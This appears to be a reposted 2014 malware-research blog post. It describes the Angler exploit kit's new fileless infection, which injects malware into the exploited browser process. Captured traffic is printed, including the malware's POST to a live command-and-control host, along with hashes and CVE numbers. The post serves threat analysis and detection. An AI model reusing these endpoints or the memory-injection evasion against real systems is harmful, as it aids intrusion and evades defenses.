Angler EK : now capable of "fileless" infection (memory malware)

[Nytro]

Angler EK : now capable of "fileless" infection (memory malware)

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Matrix - Agent Jackson avoiding bullets[/TD]

[/TR]

[/TABLE]

(First edition : I asked help to study this - Hopefully, more technical details to come soon)

Few days ago I spotted a new pattern in some Angler EK threads :

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]New pattern in a Vawtrak Thread from Angler EK

Fired : CVE-2013-2551 - 2014-08-28[/TD]

[/TR]

[/TABLE]

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]New pattern in another Vawtrak Thread from Angler EK

Fired : CVE-2014-0515 - 2014-08-29[/TD]

[/TR]

[/TABLE]

GET http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee/count?b=1 HTTP/1.1

Accept: */*

Referer: http://rwvs30r2zq.akdnbfb .com/qpbv8tg4ee

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

Accept-Encoding: gzip, deflate

Host: rwvs30r2zq.akdnbfb.com

Connection: Keep-Alive

Wondering what it was and going over different infections paths I spotted only one thread without this "new" count?b. [Note : on the 2014-08-31 count?b appeared on that thread too]

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Angler EK - 2014-08-28

"Memory Malware" thread[/TD]

[/TR]

[/TABLE]

Exploits' hashes were the same as on all other threads but my usual tools were not able to gather the payload and what surprised me more is that HIPS (like Faronics antiexec) were bypassed (note : I tried Malwarebytes AntiExploit and it was able to spot the ROP and Stack pivoting)

I spent some time to figure out what was happening here :

Angler EK is now able to infect an host without writing the malware on the drive (it's injected directly in the process running the exploited plugin)

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]

Angler EK (no landing on this screen, CVE-2014-0515 fired) and Call back from the malware injected in Internet Explorer

2nd Stage drop : 275c5f650261e80d864faf7cc6b70774 injecting itself to explorer and

then gathering Necurs on the same C&C (e.g. : be84c4689912d5689283b4b7efcaf8f2 - 2014-08-28 , b0e3e860a2dc62cb40fd6ef897ad592b 2014-08-29 , 5830dfde30873176d05604677bab6bd9 2014-08-30)

[/TD]

[TD=class: tr-caption][/TD]

[TD=class: tr-caption][/TD]

[/TR]

[/TABLE]

Malware call back in https to koqpisea.in :

217.23.3.204

49981 | 217.23.0.0/20 | WORLDSTREAM | NL | WORLDSTREAM.NL | WORLDSTREAM

Call for 2nd Stage payload looks like :

POST https://koqpisea.in/ HTTP/1.1

Host: koqpisea.in

Content-Length: 94

Connection: Keep-Alive

Cache-Control: no-cache

{"protocolVersion":1,"buildId":1049,"id":"35d1754a1c4672f2","tags":[{"type":"dll","64bit":0}]}

This feature opens a wide range of possibilities. Aside being a powerful way to bypass AV, an ideal way for one time stealer or loader (Pony, Jolly Roger, Andromeda, Smoke Bot, etc..), it also allows a detailed check of the infected host before being a little more noisy and writing anything on disk. It makes it also difficult to grab the dropper (you have to get it from the memory or from the recorded traffic then decode it). This is a powerful move for the attack side.

Additionnal illustrations :

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Injected plugin-container calling C&C after successful "memory malware" infection

via Silverlight on Firefox and Windows 7

2014-08-30[/TD]

[/TR]

[/TABLE]

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Image : Courtesy of Will Metcalf from Emerging Threats

Java calling payload then "Memory payload" activity captured by his Cuckoo instance

2014-08-28[/TD]

[/TR]

[/TABLE]

Hopefully more to come soon.

Credits: Thanks to Will Metcalf (Emerging Threats) and Mieke Verburgh (Malwarebytes) for help and advices.

Files:

AnglerEK_MM_2014-08-31 (Fiddlers + C&C calls - Owncloud)

If you want to play with Volatility or whatever, here is the memory (Mega) of a VM when IE was injected and calling C&C (IE pid : 860)

[TABLE=class: tr-caption-container, align: center]

[TR]

[TD=align: center][/TD]

[/TR]

[TR]

[TD=class: tr-caption, align: center]Capture of Fiddler just before pausing the VM

2014-08-30[/TD]

[/TR]

[/TABLE]

Sursa: Malware don't need Coffee: Angler EK : now capable of "fileless" infection (memory malware)